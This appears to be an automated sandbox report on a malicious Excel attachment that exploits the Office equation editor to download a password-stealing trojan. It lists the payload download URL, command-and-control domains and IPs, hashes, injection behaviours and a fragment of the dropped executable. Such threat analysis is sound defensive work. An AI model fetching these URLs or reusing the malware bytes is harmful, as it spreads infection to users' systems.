            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading111LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 491355 Sample: (QUOTATION)B-RUS-20061REV2.xlsx Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 16 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 21 2->15         started        process3 dnsIp4 46 180.214.239.85, 49165, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 10->46 34 C:\Users\user\AppData\...\rundll32[1].exe, PE32 10->34 dropped 36 C:\Users\Public\vbc.exe, PE32 10->36 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 1 5 10->17         started        38 C:\...\~$(QUOTATION)B-RUS-20061REV2.xlsx, data 15->38 dropped file5 signatures6 process7 signatures8 48 Multi AV Scanner detection for dropped file 17->48 50 Tries to detect virtualization through RDTSC time measurements 17->50 52 Injects a PE file into a foreign processes 17->52 20 vbc.exe 17->20         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process11 dnsIp12 40 www.paradisgrp.com 128.65.195.232, 49166, 80 INFOMANIAK-ASCH Switzerland 23->40 42 www.uvoyus.com 23->42 44 uvoyus.com 34.102.136.180, 49167, 80 GOOGLEUS United States 23->44 70 System process connects to network (likely due to code injection or exploit) 23->70 27 msiexec.exe 23->27         started        30 autofmt.exe 23->30         started        signatures13 process14 signatures15 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 32 cmd.exe 27->32         started        process16

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            (QUOTATION)B-RUS-20061REV2.xlsx29%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe13%ReversingLabsWin32.Trojan.Pwsx
            C:\Users\Public\vbc.exe13%ReversingLabsWin32.Trojan.Pwsx

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            8.0.msiexec.exe.a30000.0.unpack100%AviraHEUR/AGEN.1104764Download File
            5.2.vbc.exe.7cd780.2.unpack100%AviraHEUR/AGEN.1104764Download File
            5.2.vbc.exe.330000.0.unpack100%AviraHEUR/AGEN.1104764Download File
            5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            8.2.msiexec.exe.a30000.0.unpack100%AviraHEUR/AGEN.1104764Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://java.sun.com0%Avira URL Cloudsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
            http://180.214.239.85/service/rundll32.exe100%Avira URL Cloudmalware
            www.odysseysailingsantorini.com/cmsr/0%Avira URL Cloudsafe
            http://www.iis.fhg.de/audioPA0%URL Reputationsafe
            http://computername/printers/printername/.printer0%Avira URL Cloudsafe
            http://www.uvoyus.com/cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEp0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://treyresearch.net0%URL Reputationsafe
            http://servername/isapibackend.dll0%Avira URL Cloudsafe
            http://www.paradisgrp.com/cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.paradisgrp.com
            128.65.195.232
            truetrue
              unknown
              uvoyus.com
              34.102.136.180
              truefalse
                unknown
                www.uvoyus.com
                unknown
                unknowntrue
                  unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://180.214.239.85/service/rundll32.exetrue
                  • Avira URL Cloud: malware
                  unknown
                  www.odysseysailingsantorini.com/cmsr/true
                  • Avira URL Cloud: safe
                  low
                  http://www.uvoyus.com/cmsr/?yPWTYF2P=Z163eHxziih9zoATqlvcvJ58YKpwfcrh+Tl2ZMFzPk6a2h2CebNQOI6FcYtN0fOfP8d5cg==&rP=nVytjV1HNt3hMhEpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.paradisgrp.com/cmsr/?rP=nVytjV1HNt3hMhEp&yPWTYF2P=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==true
                  • Avira URL Cloud: safe
                  unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpfalse
                    high
                    http://www.windows.com/pctv.explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                      high
                      http://java.sun.comexplorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://investor.msn.comexplorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                        high
                        http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                          high
                          http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmpfalse
                            high
                            http://investor.msn.com/explorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                              high
                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.530438928.00000000002C7000.00000004.00000020.sdmpfalse
                                high
                                http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                low
                                http://www.%s.comPAexplorer.exe, 00000006.00000000.530688122.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000008.00000002.666125665.0000000002170000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                low
                                http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpfalse
                                  high
                                  https://support.mozilla.orgexplorer.exe, 00000006.00000000.493259044.0000000000255000.00000004.00000020.sdmpfalse
                                    high
                                    http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.487484798.0000000002CC7000.00000002.00020000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.531839524.0000000002AE0000.00000002.00020000.sdmpfalse
                                      high
                                      http://treyresearch.netexplorer.exe, 00000006.00000000.534606050.0000000004650000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.532973112.0000000003E50000.00000002.00020000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      low

                                      Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public

                                      IPDomainCountryFlagASNASN NameMalicious
                                      34.102.136.180
                                      uvoyus.comUnited States
                                      15169GOOGLEUSfalse
                                      128.65.195.232
                                      www.paradisgrp.comSwitzerland
                                      29222INFOMANIAK-ASCHtrue
                                      180.214.239.85
                                      unknownViet Nam
                                      135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                                      General Information

                                      Joe Sandbox Version:33.0.0 White Diamond
                                      Analysis ID:491355
                                      Start date:27.09.2021
                                      Start time:14:03:03
                                      Joe Sandbox Product:CloudBasic
                                      Overall analysis duration:0h 12m 43s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Sample file name:(QUOTATION)B-RUS-20061REV2.xlsx
                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                      Number of analysed new started processes analysed:12
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal100.troj.expl.evad.winXLSX@10/10@2/3
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HDC Information:
                                      • Successful, ratio: 10.1% (good quality ratio 9.6%)
                                      • Quality average: 72.4%
                                      • Quality standard deviation: 26.5%
                                      HCA Information:
                                      • Successful, ratio: 94%
                                      • Number of executed functions: 128
                                      • Number of non-executed functions: 32
                                      Cookbook Comments:
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Found application associated with file extension: .xlsx
                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                      • Attach to Office via COM
                                      • Scroll down
                                      • Close Viewer
                                      Warnings:
                                      Show All
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtCreateFile calls found.
                                      • Report size getting too big, too many NtEnumerateValueKey calls found.
                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/491355/sample/(QUOTATION)B-RUS-20061REV2.xlsx

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      14:03:35API Interceptor118x Sleep call for process: EQNEDT32.EXE modified
                                      14:03:41API Interceptor77x Sleep call for process: vbc.exe modified
                                      14:04:06API Interceptor198x Sleep call for process: msiexec.exe modified
                                      14:04:55API Interceptor1x Sleep call for process: explorer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      128.65.195.232Renewed Contract with Annex1.xlsxGet hashmaliciousBrowse
                                      • www.paradisgrp.com/cmsr/?qfVdsr=ujlsVlrzpoa18ID3lc18bZaAxLX0DfE0xdRLh6j3jOxuPYwZm7ST3/5Fs9u0Ms1f4kekUA==&zZ4pz=9rbHiH1hJ
                                      gB8j5x4VHp.exeGet hashmaliciousBrowse
                                      • www.paradisgrp.com/cmsr/?2dg=6l-DZlrx1r&nRjTuH=ujlsVlr2pvax8YP7nc18bZaAxLX0DfE0xdJb95/2nuxvPpcfhrDfh7BHvYCIXMBs3lLU
                                      180.214.239.85MV HULDA MAERSK.xlsxGet hashmaliciousBrowse
                                      • 180.214.239.85/service/rundll32.exe
                                      TB-000-YT-PR-951.xlsxGet hashmaliciousBrowse
                                      • 180.214.239.85/registry/rundll32.exe

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      www.paradisgrp.comRenewed Contract with Annex1.xlsxGet hashmaliciousBrowse
                                      • 128.65.195.232
                                      gB8j5x4VHp.exeGet hashmaliciousBrowse
                                      • 128.65.195.232

                                      ASN

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      INFOMANIAK-ASCHE2ecGhjXtGGet hashmaliciousBrowse
                                      • 185.176.226.19
                                      Renewed Contract with Annex1.xlsxGet hashmaliciousBrowse
                                      • 128.65.195.232
                                      zMPWVyU5xF.exeGet hashmaliciousBrowse
                                      • 84.16.79.73
                                      whBvzy3Lkt.exeGet hashmaliciousBrowse
                                      • 84.16.79.73
                                      phantom.x86Get hashmaliciousBrowse
                                      • 93.88.249.1
                                      gB8j5x4VHp.exeGet hashmaliciousBrowse
                                      • 128.65.195.232
                                      am2zWv3TtG.exeGet hashmaliciousBrowse
                                      • 128.65.195.88
                                      fsd8ks3VNb.exeGet hashmaliciousBrowse
                                      • 128.65.195.32
                                      2UUlKfJYJN.exeGet hashmaliciousBrowse
                                      • 83.166.138.81
                                      u3O3kHV2IT.exeGet hashmaliciousBrowse
                                      • 83.166.138.66
                                      tS9P6wPz9x.exeGet hashmaliciousBrowse
                                      • 83.166.155.153
                                      ransomware.exeGet hashmaliciousBrowse
                                      • 83.166.155.153
                                      ransomware.exeGet hashmaliciousBrowse
                                      • 83.166.155.153
                                      ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                      • 128.65.195.152
                                      GkrIJKmWHp.exeGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      RrZ6BOnPCG.exeGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      MV QU SHAN HAI.xlsxGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      PDRgIfT71e.exeGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      Spisemuligheds4.exeGet hashmaliciousBrowse
                                      • 84.16.73.17
                                      http://quip.com/uPSzAnYlObJf/eFax-Get hashmaliciousBrowse
                                      • 83.166.136.204
                                      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN201910152133#Ubc1c#Uc8fc#Ubd84#Uc2e0#Uaddc_10115_#Uc9c0#Uc544#Uc774#Ud14c#Ud06c_0.xlsxGet hashmaliciousBrowse
                                      • 103.133.106.165
                                      MV HULDA MAERSK.xlsxGet hashmaliciousBrowse
                                      • 180.214.239.85
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      sora.x86Get hashmaliciousBrowse
                                      • 14.225.54.61
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      qMRlFBUgJO.exeGet hashmaliciousBrowse
                                      • 103.151.125.18
                                      qMRlFBUgJO.exeGet hashmaliciousBrowse
                                      • 103.151.125.18
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      RFQ Beijing Chengruisi Manufacturing.xlsxGet hashmaliciousBrowse
                                      • 103.133.106.199
                                      TB-000-YT-PR-951.xlsxGet hashmaliciousBrowse
                                      • 180.214.239.85
                                      6EPlWd2sWk.exeGet hashmaliciousBrowse
                                      • 103.133.111.221
                                      qzxyEJNuK1.exeGet hashmaliciousBrowse
                                      • 103.151.123.50
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      1 Balance_PI Dt. 21.9.2021.xlsxGet hashmaliciousBrowse
                                      • 103.133.108.160
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      Zam#U00f3wienie zakupu # 49211.exeGet hashmaliciousBrowse
                                      • 103.141.138.110
                                      I Ordine di acquisto 49211.ppamGet hashmaliciousBrowse
                                      • 103.141.138.110
                                      Compensateur en A37C1_Rev 01.xlsxGet hashmaliciousBrowse
                                      • 103.133.108.160
                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                      • 103.140.251.116
                                      Hua Joo Success Industry.xlsxGet hashmaliciousBrowse
                                      • 103.133.106.199

                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                      C:\Users\Public\vbc.exeMV HULDA MAERSK.xlsxGet hashmaliciousBrowse
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exeMV HULDA MAERSK.xlsxGet hashmaliciousBrowse

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\rundll32[1].exe
                                          Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:downloaded
                                          Size (bytes):685568
                                          Entropy (8bit):7.6030295284828995
                                          Encrypted:false
                                          SSDEEP:12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
                                          MD5:50568FB6133EE4ED721EE46A3C0A9E98
                                          SHA1:4897B6F2141395071652F72D34DC3D39EB014A56
                                          SHA-256:2B1A98ADD215568BB5E1C333321CF0FFE98D9128FA149C4F5A07CE2922750B3E
                                          SHA-512:D5FACFCF30E3E9F815F595C3AF6992551D623A5592C13E7AE8DF4E29E7F6401523339BF5A7835D46C80B998FDC3338530EA677F85A08C4FE16829A83879F529F
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 13%
                                          Joe Sandbox View:
                                          • Filename: MV HULDA MAERSK.xlsx, Detection: malicious, Browse
                                          Reputation:low
                                          IE Cache URL:http://180.214.239.85/service/rundll32.exe
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Qa..............0..j.............. ........@.. ....................................@.....................................O.......`............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc...`............l..............@..@.reloc...............t..............@..B.......................H........C...............6...Q.........................................."..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*.0..q........(........(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.....*j...(......
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45827960.png
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:PNG image data, 484 x 544, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):65050
                                          Entropy (8bit):7.959940260382877
                                          Encrypted:false
                                          SSDEEP:1536:LT3dRSPKeePekFnfpQ6uF2sxiPfqu2RjWn0ZqNnbMXrpLlx6q1F:fdoPI79fpQXtjupn7Nnb8pLll
                                          MD5:22335141D285E599CDAEF99EABA59D5B
                                          SHA1:C8E5F6F30E91F2C55D96867CAA2D1E21E7A4804D
                                          SHA-256:6C0757667F548698B721E4D723768447046B509C1777D6F1474BDE45649D92B0
                                          SHA-512:CF623DC74B631AAE3DBECF1F8D7E6E129F0C44F882487F367F4CB955A3D5A9AAE96EFD77FB0843BCE84F5F9D4A3C844A42193B7C4F1D374CE147399E1C3A6C2B
                                          Malicious:false
                                          Preview: .PNG........IHDR....... ......]....b.zTXtRaw profile type exif..x..Y..8.].9.........L3....UFvU&.d..|q.;..f..^...........j.W..^...RO=..C.....=......N..).._......=........./...........?....Cl.>.......7...~....'..<...W..{o......q..5~..O.;U.ce>.W.Oxn...-.O......w..I........v..s&.|x....:......?..u.??P....y.....}q..'..}.?...........}.j..o...I...K......G.._+.U...?..W..+Nnlq.....z....RX.._...3L.1..9.........8.$.._.\....Ln....%.....fh|...d.|X.7........_....StC......+*.<.7...S\H...i>.{...Nn....../.....#..d.9...s.N..S.P...........Kxr(.1..8....<y|R..@.9.p}......E.....l......"?.Ui....RF~jj.....s...{~.SR..Z.Qo}j...Zk....i..VZm......LX......./..../?.#.g..G.u...;...f.e..f...Y..*.^.....6.................}.{.vk............[...........G..I.....7^...:zgw.)Eo.;.{D)r..B.rV....C._....us..]9...[..n...._...........sk.=..9...z...a......e.7.<Vm;....s.w....o./kq.y.w..:q`;..A({.}...w~<.S..WJ.).Zz.c.#`.xN...1.9..1...k.o. ..-.M|....,..i.[.\.;......8...x.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E5C69E1.jpeg
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
                                          Category:dropped
                                          Size (bytes):104859
                                          Entropy (8bit):7.948547334191616
                                          Encrypted:false
                                          SSDEEP:1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
                                          MD5:50B23CFD2E093C27B7624BB70EF7A825
                                          SHA1:788949A19E6CD30ABD7BE309A513F3D21CFC3064
                                          SHA-256:BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
                                          SHA-512:4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
                                          Malicious:false
                                          Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......W>....r..m(0.Q..k.<A.d~.....u.J.A..........;g.....8..mf=.2k.*....M....J....k.?...~.x....~..~..~.....s.]...G....;...j....8C.P....=..../.o.\.v...C..&...5..F.....U..n,.lmV`._.<.....r..S...z....w[C..v.....8'..ry....~%.?..-m.7.W........p.:q...D.|.+pH..a.67d.o.K......%.kga..ZE....Ea. .&_5.F.L.*8.1F@-%.{n.....F....u[.tM/..m5mm...$.&.I...$L.8..WFh.....de.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\90D5CCBD.jpeg
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
                                          Category:dropped
                                          Size (bytes):8815
                                          Entropy (8bit):7.944898651451431
                                          Encrypted:false
                                          SSDEEP:192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
                                          MD5:F06432656347B7042C803FE58F4043E1
                                          SHA1:4BD52B10B24EADECA4B227969170C1D06626A639
                                          SHA-256:409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
                                          SHA-512:358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
                                          Malicious:false
                                          Preview: ......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T.*.K..|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.*+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F672CAC.jpeg
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 220x220, segment length 16, baseline, precision 8, 686x220, frames 3
                                          Category:dropped
                                          Size (bytes):104859
                                          Entropy (8bit):7.948547334191616
                                          Encrypted:false
                                          SSDEEP:1536:MsG61be3dUW45hIfxJRv0dWHB3C7oTstUb+wfOA3MKFlYdHTXL1LUbqBGa:23S7idv+UKuZlsb1IbqBGa
                                          MD5:50B23CFD2E093C27B7624BB70EF7A825
                                          SHA1:788949A19E6CD30ABD7BE309A513F3D21CFC3064
                                          SHA-256:BC395AEB9904601F13C40A70318EB5BE8C800C864E86831BE00C061874B7D495
                                          SHA-512:4F068FBF4AB20DD9C65CC2D67FC802F7D4BC4233460B585F3F5367519095D8CD998A1F02A90CD6642FE4D5195B9EA8A6BA6BC773F722AFEA574B3DE4E7DEA979
                                          Malicious:false
                                          Preview: ......JFIF.............C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......W>....r..m(0.Q..k.<A.d~.....u.J.A..........;g.....8..mf=.2k.*....M....J....k.?...~.x....~..~..~.....s.]...G....;...j....8C.P....=..../.o.\.v...C..&...5..F.....U..n,.lmV`._.<.....r..S...z....w[C..v.....8'..ry....~%.?..-m.7.W........p.:q...D.|.+pH..a.67d.o.K......%.kga..ZE....Ea. .&_5.F.L.*8.1F@-%.{n.....F....u[.tM/..m5mm...$.&.I...$L.8..WFh.....de.
                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CC400E1B.emf
                                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                          File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                          Category:dropped
                                          Size (bytes):648132
                                          Entropy (8bit):2.812377979512145
                                          Encrypted:false
                                          SSDEEP:3072:m34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:I4UcLe0JOcXuunhqcS
                                          MD5:816D69A133BA4D7103958A560A4FD1A7
